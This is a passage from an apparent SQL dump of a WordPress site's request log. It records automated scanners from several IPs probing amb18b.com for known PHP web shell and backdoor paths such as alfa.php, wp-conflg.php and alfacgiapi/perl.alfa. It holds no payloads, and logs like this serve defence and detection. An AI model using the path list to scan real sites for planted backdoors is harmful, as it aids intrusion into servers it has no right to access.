20:21:57'),(4482,'https://amb18b.com/wp-includes/style-engine/about.php','20.222.66.73','Direct Access',1,'2025-11-07 20:21:58','2025-11-07 20:21:58'),(4483,'https://amb18b.com/.well-known/acme-challenge/mariju.php','20.222.66.73','Direct Access',1,'2025-11-07 20:22:00','2025-11-07 20:22:00'),(4484,'https://amb18b.com/about/function.php','20.222.66.73','Direct Access',1,'2025-11-07 20:22:01','2025-11-07 20:22:01'),(4485,'https://amb18b.com/wp-includes/theme-compat/chosen.php','20.222.66.73','Direct Access',1,'2025-11-07 20:22:03','2025-11-07 20:22:03'),(4486,'https://amb18b.com/admin/function.php','20.222.66.73','Direct Access',1,'2025-11-07 20:22:05','2025-11-07 20:22:05'),(4487,'https://amb18b.com/.well-known/acme-challenge/index.php','20.222.66.73','Direct Access',1,'2025-11-07 20:22:06','2025-11-07 20:22:06'),(4488,'https://amb18b.com/css/colors/blue/index.php','20.222.66.73','Direct Access',1,'2025-11-07 20:22:08','2025-11-07 20:22:08'),(4489,'https://amb18b.com/wp-admin/setup-config.php','20.222.66.73','Direct Access',1,'2025-11-07 20:22:10','2025-11-07 20:22:10'),(4490,'https://amb18b.com/wp-admin/js/index.php','20.222.66.73','Direct Access',1,'2025-11-07 20:22:14','2025-11-07 20:22:14'),(4491,'https://amb18b.com/wp-includes/assets/index.php','20.222.66.73','Direct Access',1,'2025-11-07 20:22:16','2025-11-07 20:22:16'),(4492,'https://amb18b.com/wp-includes/fonts/index.php?p=','20.222.66.73','Direct Access',1,'2025-11-07 20:22:19','2025-11-07 20:22:19'),(4493,'https://amb18b.com/.well-known/gecko-litespeed.php','20.222.66.73','Direct Access',1,'2025-11-07 20:22:21','2025-11-07 20:22:21'),(4494,'https://amb18b.com/.well-known/admin.php','20.222.66.73','Direct Access',1,'2025-11-07 20:22:22','2025-11-07 20:22:22'),(4495,'https://amb18b.com/.well-known/log.php','20.222.66.73','Direct Access',1,'2025-11-07 20:22:28','2025-11-07 20:22:28'),(4496,'https://amb18b.com/class.php','20.222.66.73','Direct Access',1,'2025-11-07 20:22:29','2025-11-07 20:22:29'),(4497,'https://amb18b.com/bless.php','20.222.66.73','Direct Access',2,'2025-11-07 20:22:38','2025-11-07 20:22:30'),(4498,'https://amb18b.com/wp-includes/js/codemirror/index.php','20.222.66.73','Direct Access',1,'2025-11-07 20:22:32','2025-11-07 20:22:32'),(4499,'https://amb18b.com/wp-includes/block-patterns/index.php','20.222.66.73','Direct Access',1,'2025-11-07 20:22:33','2025-11-07 20:22:33'),(4500,'https://amb18b.com/lock360.php','20.222.66.73','Direct Access',1,'2025-11-07 20:22:34','2025-11-07 20:22:34'),(4501,'https://amb18b.com/thai.php','20.222.66.73','Direct Access',1,'2025-11-07 20:22:36','2025-11-07 20:22:36'),(4502,'https://amb18b.com/bless5.php','20.222.66.73','Direct Access',1,'2025-11-07 20:22:39','2025-11-07 20:22:39'),(4503,'https://amb18b.com/bless10.php','20.222.66.73','Direct Access',1,'2025-11-07 20:22:40','2025-11-07 20:22:40'),(4504,'https://amb18b.com/bless19.php','20.222.66.73','Direct Access',1,'2025-11-07 20:22:41','2025-11-07 20:22:41'),(4505,'https://amb18b.com/lala.php','20.222.66.73','Direct Access',1,'2025-11-07 20:22:42','2025-11-07 20:22:42'),(4506,'https://amb18b.com/135.php','20.222.66.73','Direct Access',1,'2025-11-07 20:22:43','2025-11-07 20:22:43'),(4507,'https://amb18b.com/inde.php','20.222.66.73','Direct Access',1,'2025-11-07 20:22:45','2025-11-07 20:22:45'),(4508,'https://amb18b.com/wp-blog.php','40.122.52.254','Direct Access',1,'2025-11-07 22:21:57','2025-11-07 22:21:57'),(4509,'https://amb18b.com/qa.php','40.122.52.254','Direct Access',1,'2025-11-07 22:21:59','2025-11-07 22:21:59'),(4510,'https://amb18b.com/chosen.php','40.122.52.254','Direct Access',1,'2025-11-07 22:22:05','2025-11-07 22:22:05'),(4511,'https://amb18b.com/.well-known/acme-challenge/index.php','40.122.52.254','Direct Access',1,'2025-11-07 22:22:07','2025-11-07 22:22:07'),(4512,'https://amb18b.com/wxo.php','40.122.52.254','Direct Access',1,'2025-11-07 22:22:09','2025-11-07 22:22:09'),(4513,'https://amb18b.com/wp-admin/includes/xmrlpc.php?p=','40.122.52.254','Direct Access',1,'2025-11-07 22:22:11','2025-11-07 22:22:11'),(4514,'https://amb18b.com/wp-includes/fonts/index.php','40.122.52.254','Direct Access',1,'2025-11-07 22:22:14','2025-11-07 22:22:14'),(4515,'https://amb18b.com/wp-includes/images/wp-login.php','40.122.52.254','Direct Access',1,'2025-11-07 22:22:15','2025-11-07 22:22:15'),(4516,'https://amb18b.com/02.php','40.122.52.254','Direct Access',1,'2025-11-07 22:22:17','2025-11-07 22:22:17'),(4517,'https://amb18b.com/abcd.php','40.122.52.254','Direct Access',1,'2025-11-07 22:22:19','2025-11-07 22:22:19'),(4518,'https://amb18b.com/error.php','40.122.52.254','Direct Access',1,'2025-11-07 22:22:21','2025-11-07 22:22:21'),(4519,'https://amb18b.com/yy.php','40.122.52.254','Direct Access',1,'2025-11-07 22:22:23','2025-11-07 22:22:23'),(4520,'https://amb18b.com/.well-known/index.php','40.122.52.254','Direct Access',1,'2025-11-07 22:22:26','2025-11-07 22:22:26'),(4521,'https://amb18b.com/.well-known/acme-challenge/LA.php','40.122.52.254','Direct Access',1,'2025-11-07 22:22:28','2025-11-07 22:22:28'),(4522,'https://amb18b.com/6.php','40.122.52.254','Direct Access',1,'2025-11-07 22:22:31','2025-11-07 22:22:31'),(4523,'https://amb18b.com/class.php','40.122.52.254','Direct Access',1,'2025-11-07 22:22:34','2025-11-07 22:22:34'),(4524,'https://amb18b.com/mail.php','40.122.52.254','Direct Access',1,'2025-11-07 22:22:36','2025-11-07 22:22:36'),(4525,'https://amb18b.com/lv.php','40.122.52.254','Direct Access',1,'2025-11-07 22:22:39','2025-11-07 22:22:39'),(4526,'https://amb18b.com/zwso.php','40.122.52.254','Direct Access',1,'2025-11-07 22:22:42','2025-11-07 22:22:42'),(4527,'https://amb18b.com/filemanager/dialog.php','40.122.52.254','Direct Access',1,'2025-11-07 22:22:45','2025-11-07 22:22:45'),(4528,'https://amb18b.com/r.php','40.122.52.254','Direct Access',1,'2025-11-07 22:22:47','2025-11-07 22:22:47'),(4529,'https://amb18b.com/admin/function.php','40.122.52.254','Direct Access',1,'2025-11-07 22:22:50','2025-11-07 22:22:50'),(4530,'https://amb18b.com/js/fm.php','40.122.52.254','Direct Access',1,'2025-11-07 22:22:51','2025-11-07 22:22:51'),(4531,'https://amb18b.com/buy.php','40.122.52.254','Direct Access',1,'2025-11-07 22:22:54','2025-11-07 22:22:54'),(4532,'https://amb18b.com/s.php','40.122.52.254','Direct Access',1,'2025-11-07 22:22:56','2025-11-07 22:22:56'),(4533,'https://amb18b.com/akcc.php','40.122.52.254','Direct Access',1,'2025-11-07 22:22:58','2025-11-07 22:22:58'),(4534,'https://amb18b.com/qing.php','40.122.52.254','Direct Access',1,'2025-11-07 22:23:00','2025-11-07 22:23:00'),(4535,'https://amb18b.com/w.php?p=','40.122.52.254','Direct Access',1,'2025-11-07 22:23:03','2025-11-07 22:23:03'),(4536,'https://amb18b.com/wp-admin/images/singlep.php','40.122.52.254','Direct Access',1,'2025-11-07 22:23:06','2025-11-07 22:23:07'),(4537,'https://amb18b.com/.well-known/pki-validation/alfacgiapi/wawe_gH298.php','40.122.52.254','Direct Access',1,'2025-11-07 22:23:10','2025-11-07 22:23:10'),(4538,'https://amb18b.com/class20.php','40.122.52.254','Direct Access',1,'2025-11-07 22:23:13','2025-11-07 22:23:13'),(4539,'https://amb18b.com/vendor/nikic/php-parser/parser.php','40.122.52.254','Direct Access',1,'2025-11-07 22:23:16','2025-11-07 22:23:16'),(4540,'https://amb18b.com/upload/wp-info.php','40.122.52.254','Direct Access',1,'2025-11-07 22:23:20','2025-11-07 22:23:20'),(4541,'https://amb18b.com/wp-includes/assets/index.php','40.122.52.254','Direct Access',1,'2025-11-07 22:23:24','2025-11-07 22:23:24'),(4542,'https://amb18b.com/cf.php','40.122.52.254','Direct Access',1,'2025-11-07 22:23:26','2025-11-07 22:23:26'),(4543,'https://amb18b.com/bak.php','40.122.52.254','Direct Access',1,'2025-11-07 22:23:29','2025-11-07 22:23:29'),(4544,'https://amb18b.com/AxAo.php','40.122.52.254','Direct Access',1,'2025-11-07 22:23:31','2025-11-07 22:23:31'),(4545,'https://amb18b.com/worksec.php','40.122.52.254','Direct Access',1,'2025-11-07 22:23:34','2025-11-07 22:23:34'),(4546,'https://amb18b.com/chosen.php?','40.122.52.254','Direct Access',1,'2025-11-07 22:23:35','2025-11-07 22:23:35'),(4547,'https://amb18b.com/sx.php','40.122.52.254','Direct Access',1,'2025-11-07 22:23:37','2025-11-07 22:23:37'),(4548,'https://amb18b.com/minik.php','40.122.52.254','Direct Access',1,'2025-11-07 22:23:39','2025-11-07 22:23:39'),(4549,'https://amb18b.com/d2.php','40.122.52.254','Direct Access',1,'2025-11-07 22:23:42','2025-11-07 22:23:42'),(4550,'https://amb18b.com/index/function.php','40.122.52.254','Direct Access',1,'2025-11-07 22:23:47','2025-11-07 22:23:47'),(4551,'https://amb18b.com/456.php','40.122.52.254','Direct Access',1,'2025-11-07 22:23:50','2025-11-07 22:23:50'),(4552,'https://amb18b.com/wp-includes/block-patterns/index.php','40.122.52.254','Direct Access',1,'2025-11-07 22:23:52','2025-11-07 22:23:52'),(4553,'https://amb18b.com/html.php','40.122.52.254','Direct Access',1,'2025-11-07 22:23:54','2025-11-07 22:23:54'),(4554,'https://amb18b.com/goods.php','40.122.52.254','Direct Access',1,'2025-11-07 22:23:56','2025-11-07 22:23:56'),(4555,'https://amb18b.com/wp-gr.php','40.122.52.254','Direct Access',1,'2025-11-07 22:23:58','2025-11-07 22:23:58'),(4556,'https://amb18b.com/admin/upload/css.php','40.122.52.254','Direct Access',1,'2025-11-07 22:24:00','2025-11-07 22:24:00'),(4557,'https://amb18b.com/berlin.php','40.122.52.254','Direct Access',1,'2025-11-07 22:24:03','2025-11-07 22:24:03'),(4558,'https://amb18b.com/themes.php','40.122.52.254','Direct Access',1,'2025-11-07 22:24:07','2025-11-07 22:24:07'),(4559,'https://amb18b.com/css/index.php','40.122.52.254','Direct Access',1,'2025-11-07 22:24:10','2025-11-07 22:24:10'),(4560,'https://amb18b.com/wp-includes/Text/Diff/Engine/about.php','40.122.52.254','Direct Access',1,'2025-11-07 22:24:12','2025-11-07 22:24:12'),(4561,'https://amb18b.com/13k.php','40.122.52.254','Direct Access',1,'2025-11-07 22:24:15','2025-11-07 22:24:15'),(4562,'https://amb18b.com/web/wp-login.php','40.122.52.254','Direct Access',1,'2025-11-07 22:24:17','2025-11-07 22:24:17'),(4563,'https://amb18b.com/c.php','40.122.52.254','Direct Access',1,'2025-11-07 22:24:19','2025-11-07 22:24:19'),(4564,'https://amb18b.com/ioxi002.PhP7','40.122.52.254','Direct Access',1,'2025-11-07 22:24:21','2025-11-07 22:24:21'),(4565,'https://amb18b.com/file.php?','40.122.52.254','Direct Access',1,'2025-11-07 22:24:24','2025-11-07 22:24:24'),(4566,'https://amb18b.com/info/info.php','40.122.52.254','Direct Access',1,'2025-11-07 22:24:26','2025-11-07 22:24:26'),(4567,'https://amb18b.com/.well-known/log.php','40.122.52.254','Direct Access',1,'2025-11-07 22:24:28','2025-11-07 22:24:28'),(4568,'https://amb18b.com/uwu2.php','40.122.52.254','Direct Access',1,'2025-11-07 22:24:30','2025-11-07 22:24:30'),(4569,'https://amb18b.com/filename.php','40.122.52.254','Direct Access',1,'2025-11-07 22:24:33','2025-11-07 22:24:33'),(4570,'https://amb18b.com/20.php','40.122.52.254','Direct Access',1,'2025-11-07 22:24:37','2025-11-07 22:24:37'),(4571,'https://amb18b.com/wp-includes/theme-compat/wp-login.php','40.122.52.254','Direct Access',1,'2025-11-07 22:24:39','2025-11-07 22:24:39'),(4572,'https://amb18b.com/wp-includes/widgets//include.php','40.122.52.254','Direct Access',1,'2025-11-07 22:24:41','2025-11-07 22:24:41'),(4573,'https://amb18b.com/jp.php','40.122.52.254','Direct Access',1,'2025-11-07 22:24:43','2025-11-07 22:24:43'),(4574,'https://amb18b.com/wp-2019.php?','40.122.52.254','Direct Access',1,'2025-11-07 22:24:45','2025-11-07 22:24:45'),(4575,'https://amb18b.com/fw.php','40.122.52.254','Direct Access',1,'2025-11-07 22:24:47','2025-11-07 22:24:47'),(4576,'https://amb18b.com/a.php','40.122.52.254','Direct Access',1,'2025-11-07 22:24:50','2025-11-07 22:24:50'),(4577,'https://amb18b.com/manager.php?p=','40.122.52.254','Direct Access',1,'2025-11-07 22:24:53','2025-11-07 22:24:53'),(4578,'https://amb18b.com/a1.php','40.122.52.254','Direct Access',1,'2025-11-07 22:24:55','2025-11-07 22:24:55'),(4579,'https://amb18b.com/inputs.php','40.122.52.254','Direct Access',1,'2025-11-07 22:24:58','2025-11-07 22:24:58'),(4580,'https://amb18b.com/wp-includes/theme-compat/chosen.php','40.122.52.254','Direct Access',1,'2025-11-07 22:25:01','2025-11-07 22:25:01'),(4581,'https://amb18b.com/w.php','40.122.52.254','Direct Access',1,'2025-11-07 22:25:04','2025-11-07 22:25:04'),(4582,'https://amb18b.com/7.php','40.122.52.254','Direct Access',1,'2025-11-07 22:25:06','2025-11-07 22:25:06'),(4583,'https://amb18b.com/V3.php','40.122.52.254','Direct Access',1,'2025-11-07 22:25:08','2025-11-07 22:25:08'),(4584,'https://amb18b.com/config.php','40.122.52.254','Direct Access',1,'2025-11-07 22:25:10','2025-11-07 22:25:10'),(4585,'https://amb18b.com/wp-plain.php','20.243.41.203','Invalid Referrer',1,'2025-11-07 22:55:32','2025-11-07 22:55:32'),(4586,'https://amb18b.com/ALFA_DATA/alfacgiapi/perl.alfa','20.243.41.203','Invalid Referrer',1,'2025-11-07 22:55:33','2025-11-07 22:55:33'),(4587,'https://amb18b.com/','20.243.41.203','Invalid Referrer',2,'2025-11-07 22:55:40','2025-11-07 22:55:39'),(4588,'https://amb18b.com/alfacgiapi/perl.alfa','20.243.41.203','Invalid Referrer',1,'2025-11-07 22:55:42','2025-11-07 22:55:42'),(4589,'https://amb18b.com/plugins/content/apismtp/apismtp.php?test=hello','20.243.41.203','Direct Access',1,'2025-11-07 22:55:44','2025-11-07 22:55:44'),(4590,'https://amb18b.com/plugins/content/apismtp/apismtp.php.suspected?test=hello','20.243.41.203','Direct Access',1,'2025-11-07 22:55:47','2025-11-07 22:55:47'),(4591,'https://amb18b.com/htaccess.php','20.37.96.143','Direct Access',1,'2025-11-08 02:55:45','2025-11-08 02:55:45'),(4592,'https://amb18b.com/readme.php','20.37.96.143','Direct Access',1,'2025-11-08 02:55:46','2025-11-08 02:55:46'),(4593,'https://amb18b.com/as.php','20.37.96.143','Direct Access',1,'2025-11-08 02:55:47','2025-11-08 02:55:47'),(4594,'https://amb18b.com/403.php','20.37.96.143','Direct Access',1,'2025-11-08 02:55:49','2025-11-08 02:55:49'),(4595,'https://amb18b.com/max.php','20.37.96.143','Direct Access',1,'2025-11-08 02:55:50','2025-11-08 02:55:50'),(4596,'https://amb18b.com/m.php','20.37.96.143','Direct Access',1,'2025-11-08 02:55:51','2025-11-08 02:55:51'),(4597,'https://amb18b.com/post.php','20.37.96.143','Direct Access',1,'2025-11-08 02:55:52','2025-11-08 02:55:52'),(4598,'https://amb18b.com/themes.php','20.37.96.143','Direct Access',1,'2025-11-08 02:55:53','2025-11-08 02:55:53'),(4599,'https://amb18b.com/ALFA_DATA/index.php','20.37.96.143','Direct Access',1,'2025-11-08 02:55:55','2025-11-08 02:55:55'),(4600,'https://amb18b.com/wp-admin/maint/about.php','20.37.96.143','Direct Access',1,'2025-11-08 02:55:56','2025-11-08 02:55:56'),(4601,'https://amb18b.com/wp-admin/network/wp-conflg.php?p=','20.37.96.143','Direct Access',1,'2025-11-08 02:55:57','2025-11-08 02:55:57'),(4602,'https://amb18b.com/click.php','20.37.96.143','Direct Access',1,'2025-11-08 02:55:58','2025-11-08 02:55:58'),(4603,'https://amb18b.com/install.php','20.37.96.143','Direct Access',1,'2025-11-08 02:55:59','2025-11-08 02:55:59'),(4604,'https://amb18b.com/lv.php','20.37.96.143','Direct Access',1,'2025-11-08 02:56:00','2025-11-08 02:56:00'),(4605,'https://amb18b.com/simple.php','20.37.96.143','Direct Access',1,'2025-11-08 02:56:01','2025-11-08 02:56:01'),(4606,'https://amb18b.com/13k.php','20.37.96.143','Direct Access',1,'2025-11-08 02:56:02','2025-11-08 02:56:02'),(4607,'https://amb18b.com/css.php','20.37.96.143','Direct Access',2,'2025-11-08 02:56:23','2025-11-08 02:56:03'),(4608,'https://amb18b.com/up.php?x=','20.37.96.143','Direct Access',1,'2025-11-08 02:56:04','2025-11-08 02:56:04'),(4609,'https://amb18b.com/0x1949.php','20.37.96.143','Direct Access',1,'2025-11-08 02:56:05','2025-11-08 02:56:05'),(4610,'https://amb18b.com/cong.php','20.37.96.143','Direct Access',2,'2025-11-08 02:56:14','2025-11-08 02:56:06'),(4611,'https://amb18b.com/fw.php','20.37.96.143','Direct Access',1,'2025-11-08 02:56:08','2025-11-08 02:56:08'),(4612,'https://amb18b.com/bs1.php','20.37.96.143','Direct Access',1,'2025-11-08 02:56:09','2025-11-08 02:56:09'),(4613,'https://amb18b.com/wp-includes/images/wp-login.php','20.37.96.143','Direct Access',1,'2025-11-08 02:56:10','2025-11-08 02:56:10'),(4614,'https://amb18b.com/termps.php','20.37.96.143','Direct Access',1,'2025-11-08 02:56:11','2025-11-08 02:56:11'),(4615,'https://amb18b.com/brand.php','20.37.96.143','Direct Access',1,'2025-11-08 02:56:12','2025-11-08 02:56:12'),(4616,'https://amb18b.com/goods.php','20.37.96.143','Direct Access',1,'2025-11-08 02:56:13','2025-11-08 02:56:13'),(4617,'https://amb18b.com/atomlib.php','20.37.96.143','Direct Access',1,'2025-11-08 02:56:15','2025-11-08 02:56:15'),(4618,'https://amb18b.com/w.php','20.37.96.143','Direct Access',1,'2025-11-08 02:56:16','2025-11-08 02:56:16'),(4619,'https://amb18b.com/404.php?fm=true','20.37.96.143','Direct Access',1,'2025-11-08 02:56:17','2025-11-08 02:56:17'),(4620,'https://amb18b.com/404.php','20.37.96.143','Direct Access',1,'2025-11-08 02:56:18','2025-11-08 02:56:18'),(4621,'https://amb18b.com/article.php','20.37.96.143','Direct Access',1,'2025-11-08 02:56:19','2025-11-08 02:56:19'),(4622,'https://amb18b.com/0x.php','20.37.96.143','Direct Access',2,'2025-11-08 02:56:32','2025-11-08 02:56:22'),(4623,'https://amb18b.com/modules/mod_simplefileuploadv1.3/elements/filemanager.php?p=','20.37.96.143','Direct Access',1,'2025-11-08 02:56:24','2025-11-08 02:56:24'),(4624,'https://amb18b.com/1.php','20.37.96.143','Direct Access',1,'2025-11-08 02:56:26','2025-11-08 02:56:26'),(4625,'https://amb18b.com/admin.php','20.37.96.143','Direct Access',1,'2025-11-08 02:56:27','2025-11-08 02:56:27'),(4626,'https://amb18b.com/wp-admin/maint/maint.php','20.37.96.143','Direct Access',1,'2025-11-08 02:56:28','2025-11-08 02:56:28'),(4627,'https://amb18b.com/classwithtostring.php','20.37.96.143','Direct Access',1,'2025-11-08 02:56:29','2025-11-08 02:56:29'),(4628,'https://amb18b.com/dropdown.php','20.37.96.143','Direct Access',1,'2025-11-08 02:56:30','2025-11-08 02:56:30'),(4629,'https://amb18b.com/moon.php','20.37.96.143','Direct Access',1,'2025-11-08 02:56:31','2025-11-08 02:56:31'),(4630,'https://amb18b.com/moon.php?p=','20.37.96.143','Direct Access',1,'2025-11-08 02:56:33','2025-11-08 02:56:33'),(4631,'https://amb18b.com/autoload_classmap.php?p=','20.37.96.143','Direct Access',1,'2025-11-08 02:56:34','2025-11-08 02:56:34'),(4632,'https://amb18b.com/inputs.php','20.37.96.143','Direct Access',1,'2025-11-08 02:56:35','2025-11-08 02:56:35'),(4633,'https://amb18b.com/default.php','20.37.96.143','Direct Access',1,'2025-11-08 02:56:36','2025-11-08 02:56:36'),(4634,'https://amb18b.com/fm.php?p=','20.37.96.143','Direct Access',1,'2025-11-08 02:56:37','2025-11-08 02:56:37'),(4635,'https://amb18b.com/fm.php?fm=true','20.37.96.143','Direct Access',1,'2025-11-08 02:56:38','2025-11-08 02:56:38'),(4636,'https://amb18b.com/about.php','20.37.96.143','Direct Access',1,'2025-11-08 02:56:39','2025-11-08 02:56:39'),(4637,'https://amb18b.com/file.php?','20.37.96.143','Direct Access',1,'2025-11-08 02:56:40','2025-11-08 02:56:40'),(4638,'https://amb18b.com/alfa.php','20.37.96.143','Direct Access',1,'2025-11-08 02:56:41','2025-11-08 02:56:41'),(4639,'https://amb18b.com/buy.php','20.37.96.143','Direct Access',1,'2025-11-08 02:56:43','2025-11-08 02:56:43'),(4640,'https://amb18b.com/themes/twentytwentytwo/index.php','20.37.96.143','Direct Access',1,'2025-11-08 02:56:44','2025-11-08 02:56:44'),(4641,'https://amb18b.com/wp-admin/js/wp-conflg.php?p=','20.37.96.143','Direct Access',1,'2025-11-08 02:56:45','2025-11-08 02:56:45'),(4642,'https://amb18b.com/wp-admin/wp-conflg.php?p=','20.37.96.143','Direct Access',1,'2025-11-08 02:56:46','2025-11-08 02:56:46'),(4643,'https://amb18b.com/wp-admin/css/wp-conflg.php?p=','20.37.96.143','Direct Access',1,'2025-11-08 02:56:47','2025-11-08 02:56:47'),(4644,'https://amb18b.com/public_html','20.37.96.143','Direct Access',1,'2025-11-08 02:56:48','2025-11-08 02:56:48'),(4645,'https://amb18b.com/r.php','20.37.96.143','Direct Access',1,'2025-11-08 02:56:49','2025-11-08 02:56:49'),(4646,'https://amb18b.com/?p=1','116.179.32.21','Direct Access',1,'2025-11-08 04:50:23','2025-11-08 04:50:23'),(4647,'https://amb18b.com/file1.php','4.241.170.137','Direct Access',1,'2025-11-08 05:09:41','2025-11-08 05:09:41'),(4648,'https://amb18b.com/file2.php','4.241.170.137','Direct Access',1,'2025-11-08 05:09:43','2025-11-08 05:09:43'),(4649,'https://amb18b.com/file3.php','4.241.170.137','Direct Access',1,'2025-11-08 05:09:44','2025-11-08 05:09:44'),(4650,'https://amb18b.com/file4.php','4.241.170.137','Direct Access',1,'2025-11-08 05:09:45','2025-11-08 05:09:45'),(4651,'https://amb18b.com/file5.php','4.241.170.137','Direct Access',1,'2025-11-08 05:09:46','2025-11-08 05:09:46'),(4652,'https://amb18b.com/file6.php','4.241.170.137','Direct Access',1,'2025-11-08 05:09:48','2025-11-08 05:09:48'),(4653,'https://amb18b.com/file7.php','4.241.170.137','Direct Access',1,'2025-11-08 05:09:49','2025-11-08 05:09:49'),(4654,'https://amb18b.com/file8.php','4.241.170.137','Direct Access',1,'2025-11-08 05:09:50','2025-11-08 05:09:50'),(4655,'https://amb18b.com/file9.php','4.241.170.137','Direct Access',1,'2025-11-08 05:09:52','2025-11-08 05:09:52'),(4656,'https://amb18b.com/file10.php','4.241.170.137','Direct Access',1,'2025-11-08 05:09:53','2025-11-08 05:09:53'),(4657,'https://amb18b.com/file11.php','4.241.170.137','Direct Access',1,'2025-11-08 05:09:54','2025-11-08 05:09:54'),(4658,'https://amb18b.com/chosen.php?p','4.241.170.137','Direct Access',1,'2025-11-08 05:09:55','2025-11-08 05:09:55'),(4659,'https://amb18b.com/class20.php','4.241.170.137','Direct Access',1,'2025-11-08 05:09:56','2025-11-08 05:09:56'),(4660,'https://amb18b.com/lock360.php','4.241.170.137','Direct Access',1,'2025-11-08 05:09:58','2025-11-08 05:09:58'),(4661,'https://amb18b.com/goods.php','4.241.170.137','Direct Access',1,'2025-11-08 05:09:59','2025-11-08 05:09:59'),(4662,'https://amb18b.com/filemanager.php','4.241.170.137','Direct Access',1,'2025-11-08 05:10:00','2025-11-08 05:10:00'),(4663,'https://amb18b.com/bless.php','4.241.170.137','Direct Access',1,'2025-11-08 05:10:01','2025-11-08 05:10:01'),(4664,'https://amb18b.com/atomlib.php','4.241.170.137','Direct Access',1,'2025-11-08 05:10:02','2025-11-08 05:10:02'),(4665,'https://amb18b.com/admin.php?p','4.241.170.137','Direct Access',1,'2025-11-08 05:10:04','2025-11-08 05:10:04'),(4666,'https://amb18b.com/we.php','4.241.170.137','Direct Access',1,'2025-11-08 05:10:05','2025-11-08 05:10:05'),(4667,'https://amb18b.com/aa.php','4.241.170.137','Direct Access',1,'2025-11-08 05:10:06','2025-11-08 05:10:06'),(4668,'https://amb18b.com/abcd.php','4.241.170.137','Direct Access',1,'2025-11-08 05:10:07','2025-11-08 05:10:07'),(4669,'https://amb18b.com/asus.php','4.241.170.137','Direct Access',1,'2025-11-08 05:10:08','2025-11-08 05:10:08'),(4670,'https://amb18b.com/wp-gr.php','4.241.170.137','Direct Access',1,'2025-11-08 05:10:10','2025-11-08 05:10:10'),(4671,'https://amb18b.com/a1.php','4.241.170.137','Direct Access',1,'2025-11-08 05:10:11','2025-11-08 05:10:11'),(4672,'https://amb18b.com/chosen.php','4.241.170.137','Direct Access',1,'2025-11-08 05:10:12','2025-11-08 05:10:12'),(4673,'https://amb18b.com/alfa.php','4.241.170.137','Direct Access',1,'2025-11-08 05:10:13','2025-11-08 05:10:13'),(4674,'https://amb18b.com/ahax.php','4.241.170.137','Direct Access',1,'2025-11-08 05:10:15','2025-11-08 05:10:15'),(4675,'https://amb18b.com/dev.php?p','4.241.170.137','Direct Access',1,'2025-11-08 05:10:16','2025-11-08 05:10:16'),(4676,'https://amb18b.com/wp-blog.php','4.241.170.137','Direct Access',1,'2025-11-08 05:10:17','2025-11-08 05:10:17'),(4677,'https://amb18b.com/epinyins.php','4.241.170.137','Direct Access',1,'2025-11-08 05:10:18','2025-11-08 05:10:18'),(4678,'https://amb18b.com/a2.php','4.241.170.137','Direct Access',1,'2025-11-08 05:10:19','2025-11-08 05:10:19'),(4679,'https://amb18b.com/moon.php?p','4.241.170.137','Direct Access',1,'2025-11-08 05:10:20','2025-11-08 05:10:20'),(4680,'https://amb18b.com/fm.php?p','4.241.170.137','Direct Access',1,'2025-11-08 05:10:21','2025-11-08 05:10:21'),(4681,'https://amb18b.com/ahax.php?p','4.241.170.137','Direct Access',1,'2025-11-08 05:10:22','2025-11-08 05:10:22'),(4682,'https://amb18b.com/wp.php','4.241.170.137','Direct Access',1,'2025-11-08 05:10:24','2025-11-08 05:10:24'),(4683,'https://amb18b.com/system_log.php','4.241.170.137','Direct Access',1,'2025-11-08 05:10:25','2025-11-08 05:10:25'),(4684,'https://amb18b.com/file.php','4.241.170.137','Direct Access',1,'2025-11-08 05:10:26','2025-11-08 05:10:26'),(4685,'https://amb18b.com/av.php','4.241.170.137','Direct Access',1,'2025-11-08 05:10:27','2025-11-08 05:10:27'),(4686,'https://amb18b.com/sites/all/libraries/elfinder/src/connectors/php/connector.php','94.74.182.45','Direct Access',1,'2025-11-08 06:56:31','2025-11-08 06:56:31'),(4687,'https://amb18b.com/link.php','172.207.9.124','Direct Access',2,'2025-11-08 09:07:57','2025-11-08 09:07:13'),(4688,'https://amb18b.com/chosen.php?p=','172.207.9.124','Direct Access',1,'2025-11-08 09:07:14','2025-11-08 09:07:14'),(4689,'https://amb18b.com/mail.php','172.207.9.124','Direct Access',1,'2025-11-08 09:07:15','2025-11-08 09:07:15'),(4690,'https://amb18b.com/lock360.php','172.207.9.124','Direct Access',1,'2025-11-08 09:07:17','2025-11-08 09:07:17'),(4691,'https://amb18b.com/function.php','172.207.9.124','Direct Access',1,'2025-11-08 09:07:18','2025-11-08 09:07:18'),(4692,'https://amb18b.com/classwithtostring.php','172.207.9.124','Direct Access',1,'2025-11-08 09:07:19','2025-11-08 09:07:19'),(4693,'https://amb18b.com/1.php','172.207.9.124','Direct Access',1,'2025-11-08 09:07:21','2025-11-08 09:07:21'),(4694,'https://amb18b.com/autoload_classmap.php?p=','172.207.9.124','Direct Access',1,'2025-11-08 09:07:22','2025-11-08 09:07:22'),(4695,'https://amb18b.com/post.php','172.207.9.124','Direct Access',1,'2025-11-08 09:07:23','2025-11-08 09:07:23'),(4696,'https://amb18b.com/wp-conflg.php?p=','172.207.9.124','Direct Access',1,'2025-11-08 09:07:24','2025-11-08 09:07:24'),(4697,'https://amb18b.com/manager.php?p=','172.207.9.124','Direct Access',1,'2025-11-08 09:07:27','2025-11-08 09:07:27'),(4698,'https://amb18b.com/alfa.php','172.207.9.124','Direct Access',1,'2025-11-08 09:07:28','2025-11-08 09:07:28'),(4699,'https://amb18b.com/goods.php','172.207.9.124','Direct Access',1,'2025-11-08 09:07:29','2025-11-08 09:07:29'),(4700,'https://amb18b.com/wp-trackback.php','172.207.9.124','Direct Access',1,'2025-11-08 09:07:31','2025-11-08 09:07:31'),(4701,'https://amb18b.com/about.php?p=','172.207.9.124','Direct Access',1,'2025-11-08 09:07:32','2025-11-08 09:07:32'),(4702,'https://amb18b.com/themes.php','172.207.9.124','Direct Access',1,'2025-11-08 09:07:33','2025-11-08 09:07:33'),(4703,'https://amb18b.com/simple.php','172.207.9.124','Direct Access',1,'2025-11-08 09:07:36','2025-11-08 09:07:36'),(4704,'https://amb18b.com/class.php?p=','172.207.9.124','Direct Access',1,'2025-11-08 09:07:38','2025-11-08 09:07:38'),(4705,'https://amb18b.com/as.php','172.207.9.124','Direct Access',1,'2025-11-08 09:07:40','2025-11-08 09:07:40'),(4706,'https://amb18b.com/file.php','172.207.9.124','Direct Access',1,'2025-11-08 09:07:42','2025-11-08 09:07:42'),(4707,'https://amb18b.com/bless.php','172.207.9.124','Direct Access',1,'2025-11-08 09:07:43','2025-11-08 09:07:43'),(4708,'https://amb18b.com/alfanew.php','172.207.9.124','Direct Access',2,'2025-11-08 09:08:49','2025-11-08 